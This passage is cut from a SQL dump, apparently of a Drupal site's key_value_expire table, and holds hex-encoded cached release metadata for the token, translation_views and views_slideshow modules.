7b733a31323a2252656c656173652074797065223b613a323a7b693a303b733a393a22427567206669786573223b693a313b733a31323a224e6577206665617475726573223b7d7d733a383a227365637572697479223b733a34343a22436f76657265642062792044727570616c27732073656375726974792061647669736f727920706f6c696379223b733a31383a22636f72655f636f6d7061746962696c697479223b733a333a22382e78223b7d733a373a22382e782d312e31223b613a31313a7b733a343a226e616d65223b733a31333a22746f6b656e20382e782d312e31223b733a373a2276657273696f6e223b733a373a22382e782d312e31223b733a333a22746167223b733a373a22382e782d312e31223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35333a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f746f6b656e2f72656c65617365732f382e782d312e31223b733a31333a22646f776e6c6f61645f6c696e6b223b733a35383a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f746f6b656e2d382e782d312e312e7461722e677a223b733a343a2264617465223b733a31303a2231353133383130333834223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a313a7b693a303b733a393a22427567206669786573223b7d7d733a383a227365637572697479223b733a34343a22436f76657265642062792044727570616c27732073656375726974792061647669736f727920706f6c696379223b733a31383a22636f72655f636f6d7061746962696c697479223b733a333a22382e78223b7d733a373a22382e782d312e30223b613a31313a7b733a343a226e616d65223b733a31333a22746f6b656e20382e782d312e30223b733a373a2276657273696f6e223b733a373a22382e782d312e30223b733a333a22746167223b733a373a22382e782d312e30223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35333a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f746f6b656e2f72656c65617365732f382e782d312e30223b733a31333a22646f776e6c6f61645f6c696e6b223b733a35383a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f746f6b656e2d382e782d312e302e7461722e677a223b733a343a2264617465223b733a31303a2231343933343636383433223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a313a7b693a303b733a393a22427567206669786573223b7d7d733a383a227365637572697479223b733a34343a22436f76657265642062792044727570616c27732073656375726974792061647669736f727920706f6c696379223b733a31383a22636f72655f636f6d7061746962696c697479223b733a333a22382e78223b7d733a31313a22382e782d312e302d726331223b613a31313a7b733a343a226e616d65223b733a31373a22746f6b656e20382e782d312e302d726331223b733a373a2276657273696f6e223b733a31313a22382e782d312e302d726331223b733a333a22746167223b733a31313a22382e782d312e302d726331223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35373a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f746f6b656e2f72656c65617365732f382e782d312e302d726331223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36323a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f746f6b656e2d382e782d312e302d7263312e7461722e677a223b733a343a2264617465223b733a31303a2231343833323930353432223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a323a7b693a303b733a393a22427567206669786573223b693a313b733a31323a224e6577206665617475726573223b7d7d733a383a227365637572697479223b733a35383a2252432072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b733a31383a22636f72655f636f6d7061746962696c697479223b733a333a22382e78223b7d733a31333a22382e782d312e302d6265746132223b613a31313a7b733a343a226e616d65223b733a31393a22746f6b656e20382e782d312e302d6265746132223b733a373a2276657273696f6e223b733a31333a22382e782d312e302d6265746132223b733a333a22746167223b733a31333a22382e782d312e302d6265746132223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35393a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f746f6b656e2f72656c65617365732f382e782d312e302d6265746132223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36343a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f746f6b656e2d382e782d312e302d62657461322e7461722e677a223b733a343a2264617465223b733a31303a2231343734333637303339223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a313a7b693a303b733a393a22427567206669786573223b7d7d733a383a227365637572697479223b733a36303a22426574612072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b733a31383a22636f72655f636f6d7061746962696c697479223b733a333a22382e78223b7d733a31333a22382e782d312e302d6265746131223b613a31313a7b733a343a226e616d65223b733a31393a22746f6b656e20382e782d312e302d6265746131223b733a373a2276657273696f6e223b733a31333a22382e782d312e302d6265746131223b733a333a22746167223b733a31333a22382e782d312e302d6265746131223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35393a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f746f6b656e2f72656c65617365732f382e782d312e302d6265746131223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36343a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f746f6b656e2d382e782d312e302d62657461312e7461722e677a223b733a343a2264617465223b733a31303a2231343730383634343533223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a323a7b693a303b733a393a22427567206669786573223b693a313b733a31323a224e6577206665617475726573223b7d7d733a383a227365637572697479223b733a36303a22426574612072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b733a31383a22636f72655f636f6d7061746962696c697479223b733a333a22382e78223b7d733a31343a22382e782d312e302d616c70686132223b613a31313a7b733a343a226e616d65223b733a32303a22746f6b656e20382e782d312e302d616c70686132223b733a373a2276657273696f6e223b733a31343a22382e782d312e302d616c70686132223b733a333a22746167223b733a31343a22382e782d312e302d616c70686132223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a36303a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f746f6b656e2f72656c65617365732f382e782d312e302d616c70686132223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36353a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f746f6b656e2d382e782d312e302d616c706861322e7461722e677a223b733a343a2264617465223b733a31303a2231343533333633373339223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a323a7b693a303b733a393a22427567206669786573223b693a313b733a31323a224e6577206665617475726573223b7d7d733a383a227365637572697479223b733a36313a22416c7068612072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b733a31383a22636f72655f636f6d7061746962696c697479223b733a333a22382e78223b7d733a31343a22382e782d312e302d616c70686131223b613a31313a7b733a343a226e616d65223b733a32303a22746f6b656e20382e782d312e302d616c70686131223b733a373a2276657273696f6e223b733a31343a22382e782d312e302d616c70686131223b733a333a22746167223b733a31343a22382e782d312e302d616c70686131223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a36303a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f746f6b656e2f72656c65617365732f382e782d312e302d616c70686131223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36353a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f746f6b656e2d382e782d312e302d616c706861312e7461722e677a223b733a343a2264617465223b733a31303a2231343530393631333339223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a323a7b693a303b733a393a22427567206669786573223b693a313b733a31323a224e6577206665617475726573223b7d7d733a383a227365637572697479223b733a36313a22416c7068612072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b733a31383a22636f72655f636f6d7061746962696c697479223b733a333a22382e78223b7d733a31313a22382e782d312e782d646576223b613a31313a7b733a343a226e616d65223b733a31373a22746f6b656e20382e782d312e782d646576223b733a373a2276657273696f6e223b733a31313a22382e782d312e782d646576223b733a333a22746167223b733a373a22382e782d312e78223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35373a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f746f6b656e2f72656c65617365732f382e782d312e782d646576223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36323a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f746f6b656e2d382e782d312e782d6465762e7461722e677a223b733a343a2264617465223b733a31303a2231373833363239313332223b733a353a2266696c6573223b733a303a22223b733a383a227365637572697479223b733a35393a224465762072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b733a31383a22636f72655f636f6d7061746962696c697479223b733a31393a225e31302e33207c7c205e3131207c7c205e3132223b733a353a227465726d73223b613a303a7b7d7d7d733a31303a226c6173745f6665746368223b693a313738373833363338303b7d, 1787922780),
('update_available_releases', 'translation_views', 0x613a31303a7b733a353a227469746c65223b733a31373a225472616e736c6174696f6e205669657773223b733a31303a2273686f72745f6e616d65223b733a31373a227472616e736c6174696f6e5f7669657773223b733a343a2274797065223b733a31343a2270726f6a6563745f6d6f64756c65223b733a31383a22737570706f727465645f6272616e63686573223b733a31313a22322e302e2c382e782d312e223b733a31383a22636f6d706f7365725f6e616d657370616365223b733a32343a2264727570616c2f7472616e736c6174696f6e5f7669657773223b733a31343a2270726f6a6563745f737461747573223b733a393a227075626c6973686564223b733a343a226c696e6b223b733a34383a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f7472616e736c6174696f6e5f7669657773223b733a353a227465726d73223b733a303a22223b733a383a2272656c6561736573223b613a31333a7b733a31323a22322e302e302d616c70686131223b613a31313a7b733a343a226e616d65223b733a33303a227472616e736c6174696f6e5f766965777320322e302e302d616c70686131223b733a373a2276657273696f6e223b733a31323a22322e302e302d616c70686131223b733a333a22746167223b733a31323a22322e302e302d616c70686131223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a37303a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f7472616e736c6174696f6e5f76696577732f72656c65617365732f322e302e302d616c70686131223b733a31333a22646f776e6c6f61645f6c696e6b223b733a37353a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f7472616e736c6174696f6e5f76696577732d322e302e302d616c706861312e7461722e677a223b733a343a2264617465223b733a31303a2231373335373834333635223b733a353a2266696c6573223b733a303a22223b733a383a227365637572697479223b733a36313a22416c7068612072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b733a31383a22636f72655f636f6d7061746962696c697479223b733a31323a225e31302e31207c7c205e3131223b733a353a227465726d73223b613a303a7b7d7d733a31353a22382e782d312e302d616c7068613131223b613a31313a7b733a343a226e616d65223b733a33333a227472616e736c6174696f6e5f766965777320382e782d312e302d616c7068613131223b733a373a2276657273696f6e223b733a31353a22382e782d312e302d616c7068613131223b733a333a22746167223b733a31353a22382e782d312e302d616c7068613131223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a37333a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f7472616e736c6174696f6e5f76696577732f72656c65617365732f382e782d312e302d616c7068613131223b733a31333a22646f776e6c6f61645f6c696e6b223b733a37383a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f7472616e736c6174696f6e5f76696577732d382e782d312e302d616c70686131312e7461722e677a223b733a343a2264617465223b733a31303a2231363739363630363638223b733a353a2266696c6573223b733a303a22223b733a383a227365637572697479223b733a36313a22416c7068612072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b733a31383a22636f72655f636f6d7061746962696c697479223b733a31373a225e382e38207c7c205e39207c7c205e3130223b733a353a227465726d73223b613a303a7b7d7d733a31353a22382e782d312e302d616c7068613130223b613a31313a7b733a343a226e616d65223b733a33333a227472616e736c6174696f6e5f766965777320382e782d312e302d616c7068613130223b733a373a2276657273696f6e223b733a31353a22382e782d312e302d616c7068613130223b733a333a22746167223b733a31353a22382e782d312e302d616c7068613130223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a37333a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f7472616e736c6174696f6e5f76696577732f72656c65617365732f382e782d312e302d616c7068613130223b733a31333a22646f776e6c6f61645f6c696e6b223b733a37383a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f7472616e736c6174696f6e5f76696577732d382e782d312e302d616c70686131302e7461722e677a223b733a343a2264617465223b733a31303a2231353834333033363837223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a313a7b693a303b733a393a22427567206669786573223b7d7d733a383a227365637572697479223b733a36313a22416c7068612072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b733a31383a22636f72655f636f6d7061746962696c697479223b733a31303a225e382e38207c7c205e39223b7d733a31343a22382e782d312e302d616c70686139223b613a31313a7b733a343a226e616d65223b733a33323a227472616e736c6174696f6e5f766965777320382e782d312e302d616c70686139223b733a373a2276657273696f6e223b733a31343a22382e782d312e302d616c70686139223b733a333a22746167223b733a31343a22382e782d312e302d616c70686139223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a37323a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f7472616e736c6174696f6e5f76696577732f72656c65617365732f382e782d312e302d616c70686139223b733a31333a22646f776e6c6f61645f6c696e6b223b733a37373a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f7472616e736c6174696f6e5f76696577732d382e782d312e302d616c706861392e7461722e677a223b733a343a2264617465223b733a31303a2231353736343635363835223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a313a7b693a303b733a393a22427567206669786573223b7d7d733a383a227365637572697479223b733a36313a22416c7068612072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b733a31383a22636f72655f636f6d7061746962696c697479223b733a333a22382e78223b7d733a31343a22382e782d312e302d616c70686138223b613a31313a7b733a343a226e616d65223b733a33323a227472616e736c6174696f6e5f766965777320382e782d312e302d616c70686138223b733a373a2276657273696f6e223b733a31343a22382e782d312e302d616c70686138223b733a333a22746167223b733a31343a22382e782d312e302d616c70686138223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a37323a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f7472616e736c6174696f6e5f76696577732f72656c65617365732f382e782d312e302d616c70686138223b733a31333a22646f776e6c6f61645f6c696e6b223b733a37373a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f7472616e736c6174696f6e5f76696577732d382e782d312e302d616c706861382e7461722e677a223b733a343a2264617465223b733a31303a2231353732353731333835223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a313a7b693a303b733a393a22427567206669786573223b7d7d733a383a227365637572697479223b733a36313a22416c7068612072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b733a31383a22636f72655f636f6d7061746962696c697479223b733a333a22382e78223b7d733a31343a22382e782d312e302d616c70686137223b613a31313a7b733a343a226e616d65223b733a33323a227472616e736c6174696f6e5f766965777320382e782d312e302d616c70686137223b733a373a2276657273696f6e223b733a31343a22382e782d312e302d616c70686137223b733a333a22746167223b733a31343a22382e782d312e302d616c70686137223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a37323a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f7472616e736c6174696f6e5f76696577732f72656c65617365732f382e782d312e302d616c70686137223b733a31333a22646f776e6c6f61645f6c696e6b223b733a37373a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f7472616e736c6174696f6e5f76696577732d382e782d312e302d616c706861372e7461722e677a223b733a343a2264617465223b733a31303a2231353633383335303831223b733a353a2266696c6573223b733a303a22223b733a383a227365637572697479223b733a36313a22416c7068612072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b733a31383a22636f72655f636f6d7061746962696c697479223b733a333a22382e78223b733a353a227465726d73223b613a303a7b7d7d733a31343a22382e782d312e302d616c70686136223b613a31313a7b733a343a226e616d65223b733a33323a227472616e736c6174696f6e5f766965777320382e782d312e302d616c70686136223b733a373a2276657273696f6e223b733a31343a22382e782d312e302d616c70686136223b733a333a22746167223b733a31343a22382e782d312e302d616c70686136223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a37323a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f7472616e736c6174696f6e5f76696577732f72656c65617365732f382e782d312e302d616c70686136223b733a31333a22646f776e6c6f61645f6c696e6b223b733a37373a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f7472616e736c6174696f6e5f76696577732d382e782d312e302d616c706861362e7461722e677a223b733a343a2264617465223b733a31303a2231353531333533323837223b733a353a2266696c6573223b733a303a22223b733a383a227365637572697479223b733a36313a22416c7068612072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b733a31383a22636f72655f636f6d7061746962696c697479223b733a333a22382e78223b733a353a227465726d73223b613a303a7b7d7d733a31343a22382e782d312e302d616c70686135223b613a31313a7b733a343a226e616d65223b733a33323a227472616e736c6174696f6e5f766965777320382e782d312e302d616c70686135223b733a373a2276657273696f6e223b733a31343a22382e782d312e302d616c70686135223b733a333a22746167223b733a31343a22382e782d312e302d616c70686135223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a37323a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f7472616e736c6174696f6e5f76696577732f72656c65617365732f382e782d312e302d616c70686135223b733a31333a22646f776e6c6f61645f6c696e6b223b733a37373a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f7472616e736c6174696f6e5f76696577732d382e782d312e302d616c706861352e7461722e677a223b733a343a2264617465223b733a31303a2231353439353831313830223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a313a7b693a303b733a31323a224e6577206665617475726573223b7d7d733a383a227365637572697479223b733a36313a22416c7068612072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b733a31383a22636f72655f636f6d7061746962696c697479223b733a333a22382e78223b7d733a31343a22382e782d312e302d616c70686134223b613a31313a7b733a343a226e616d65223b733a33323a227472616e736c6174696f6e5f766965777320382e782d312e302d616c70686134223b733a373a2276657273696f6e223b733a31343a22382e782d312e302d616c70686134223b733a333a22746167223b733a31343a22382e782d312e302d616c70686134223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a37323a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f7472616e736c6174696f6e5f76696577732f72656c65617365732f382e782d312e302d616c70686134223b733a31333a22646f776e6c6f61645f6c696e6b223b733a37373a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f7472616e736c6174696f6e5f76696577732d382e782d312e302d616c706861342e7461722e677a223b733a343a2264617465223b733a31303a2231353338313234313830223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a313a7b693a303b733a393a22427567206669786573223b7d7d733a383a227365637572697479223b733a36313a22416c7068612072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b733a31383a22636f72655f636f6d7061746962696c697479223b733a333a22382e78223b7d733a31343a22382e782d312e302d616c70686133223b613a31313a7b733a343a226e616d65223b733a33323a227472616e736c6174696f6e5f766965777320382e782d312e302d616c70686133223b733a373a2276657273696f6e223b733a31343a22382e782d312e302d616c70686133223b733a333a22746167223b733a31343a22382e782d312e302d616c70686133223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a37323a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f7472616e736c6174696f6e5f76696577732f72656c65617365732f382e782d312e302d616c70686133223b733a31333a22646f776e6c6f61645f6c696e6b223b733a37373a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f7472616e736c6174696f6e5f76696577732d382e782d312e302d616c706861332e7461722e677a223b733a343a2264617465223b733a31303a2231353337393232353830223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a323a7b693a303b733a393a22427567206669786573223b693a313b733a31323a224e6577206665617475726573223b7d7d733a383a227365637572697479223b733a36313a22416c7068612072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b733a31383a22636f72655f636f6d7061746962696c697479223b733a333a22382e78223b7d733a31343a22382e782d312e302d616c70686132223b613a31313a7b733a343a226e616d65223b733a33323a227472616e736c6174696f6e5f766965777320382e782d312e302d616c70686132223b733a373a2276657273696f6e223b733a31343a22382e782d312e302d616c70686132223b733a333a22746167223b733a31343a22382e782d312e302d616c70686132223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a37323a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f7472616e736c6174696f6e5f76696577732f72656c65617365732f382e782d312e302d616c70686132223b733a31333a22646f776e6c6f61645f6c696e6b223b733a37373a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f7472616e736c6174696f6e5f76696577732d382e782d312e302d616c706861322e7461722e677a223b733a343a2264617465223b733a31303a2231353237303930313835223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a313a7b693a303b733a393a22427567206669786573223b7d7d733a383a227365637572697479223b733a36313a22416c7068612072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b733a31383a22636f72655f636f6d7061746962696c697479223b733a333a22382e78223b7d733a31343a22382e782d312e302d616c70686131223b613a31313a7b733a343a226e616d65223b733a33323a227472616e736c6174696f6e5f766965777320382e782d312e302d616c70686131223b733a373a2276657273696f6e223b733a31343a22382e782d312e302d616c70686131223b733a333a22746167223b733a31343a22382e782d312e302d616c70686131223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a37323a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f7472616e736c6174696f6e5f76696577732f72656c65617365732f382e782d312e302d616c70686131223b733a31333a22646f776e6c6f61645f6c696e6b223b733a37373a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f7472616e736c6174696f6e5f76696577732d382e782d312e302d616c706861312e7461722e677a223b733a343a2264617465223b733a31303a2231353138353136343830223b733a353a2266696c6573223b733a303a22223b733a383a227365637572697479223b733a36313a22416c7068612072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b733a31383a22636f72655f636f6d7061746962696c697479223b733a333a22382e78223b733a353a227465726d73223b613a303a7b7d7d733a31313a22382e782d312e782d646576223b613a31313a7b733a343a226e616d65223b733a32393a227472616e736c6174696f6e5f766965777320382e782d312e782d646576223b733a373a2276657273696f6e223b733a31313a22382e782d312e782d646576223b733a333a22746167223b733a373a22382e782d312e78223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a36393a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f7472616e736c6174696f6e5f76696577732f72656c65617365732f382e782d312e782d646576223b733a31333a22646f776e6c6f61645f6c696e6b223b733a37343a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f7472616e736c6174696f6e5f76696577732d382e782d312e782d6465762e7461722e677a223b733a343a2264617465223b733a31303a2231373335373834323439223b733a353a2266696c6573223b733a303a22223b733a383a227365637572697479223b733a35393a224465762072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b733a31383a22636f72655f636f6d7061746962696c697479223b733a31323a225e31302e31207c7c205e3131223b733a353a227465726d73223b613a303a7b7d7d7d733a31303a226c6173745f6665746368223b693a313738373833363338303b7d, 1787922780);
INSERT INTO `key_value_expire` (`collection`, `name`, `value`, `expire`) VALUES
('update_available_releases', 'views_slideshow', 0x613a31303a7b733a353a227469746c65223b733a31353a22566965777320536c69646573686f77223b733a31303a2273686f72745f6e616d65223b733a31353a2276696577735f736c69646573686f77223b733a343a2274797065223b733a31343a2270726f6a6563745f6d6f64756c65223b733a31383a22737570706f727465645f6272616e63686573223b733a343a22352e302e223b733a31383a22636f6d706f7365725f6e616d657370616365223b733a32323a2264727570616c2f76696577735f736c69646573686f77223b733a31343a2270726f6a6563745f737461747573223b733a393a227075626c6973686564223b733a343a226c696e6b223b733a34363a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f76696577735f736c69646573686f77223b733a353a227465726d73223b733a303a22223b733a383a2272656c6561736573223b613a31393a7b733a353a22352e302e31223b613a31313a7b733a343a226e616d65223b733a32313a2276696577735f736c69646573686f7720352e302e31223b733a373a2276657273696f6e223b733a353a22352e302e31223b733a333a22746167223b733a353a22352e302e31223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a36313a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f76696577735f736c69646573686f772f72656c65617365732f352e302e31223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36363a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f76696577735f736c69646573686f772d352e302e312e7461722e677a223b733a343a2264617465223b733a31303a2231373234303430333731223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a313a7b693a303b733a393a22427567206669786573223b7d7d733a383a227365637572697479223b733a34343a22436f76657265642062792044727570616c27732073656375726974792061647669736f727920706f6c696379223b733a31383a22636f72655f636f6d7061746962696c697479223b733a31363a225e39207c7c205e3130207c7c205e3131223b7d733a353a22352e302e30223b613a31313a7b733a343a226e616d65223b733a32313a2276696577735f736c69646573686f7720352e302e30223b733a373a2276657273696f6e223b733a353a22352e302e30223b733a333a22746167223b733a353a22352e302e30223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a36313a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f76696577735f736c69646573686f772f72656c65617365732f352e302e30223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36363a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f76696577735f736c69646573686f772d352e302e302e7461722e677a223b733a343a2264617465223b733a31303a2231363733343735373037223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a313a7b693a303b733a393a22427567206669786573223b7d7d733a383a227365637572697479223b733a34343a22436f76657265642062792044727570616c27732073656375726974792061647669736f727920706f6c696379223b733a31383a22636f72655f636f6d7061746962696c697479223b733a393a225e39207c7c205e3130223b7d733a373a22382e782d342e38223b613a31313a7b733a343a226e616d65223b733a32333a2276696577735f736c69646573686f7720382e782d342e38223b733a373a2276657273696f6e223b733a373a22382e782d342e38223b733a333a22746167223b733a373a22382e782d342e38223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a36333a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f76696577735f736c69646573686f772f72656c65617365732f382e782d342e38223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36383a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f76696577735f736c69646573686f772d382e782d342e382e7461722e677a223b733a343a2264617465223b733a31303a2231363031333039323235223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a313a7b693a303b733a393a22427567206669786573223b7d7d733a383a227365637572697479223b733a34343a22436f76657265642062792044727570616c27732073656375726974792061647669736f727920706f6c696379223b733a31383a22636f72655f636f6d7061746962696c697479223b733a383a225e38207c7c205e39223b7d733a373a22382e782d342e37223b613a31313a7b733a343a226e616d65223b733a32333a2276696577735f736c69646573686f7720382e782d342e37223b733a373a2276657273696f6e223b733a373a22382e782d342e37223b733a333a22746167223b733a373a22382e782d342e37223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a36333a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f76696577735f736c69646573686f772f72656c65617365732f382e782d342e37223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36383a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f76696577735f736c69646573686f772d382e782d342e372e7461722e677a223b733a343a2264617465223b733a31303a2231353836373833383630223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a323a7b693a303b733a393a22427567206669786573223b693a313b733a31323a224e6577206665617475726573223b7d7d733a383a227365637572697479223b733a34343a22436f76657265642062792044727570616c27732073656375726974792061647669736f727920706f6c6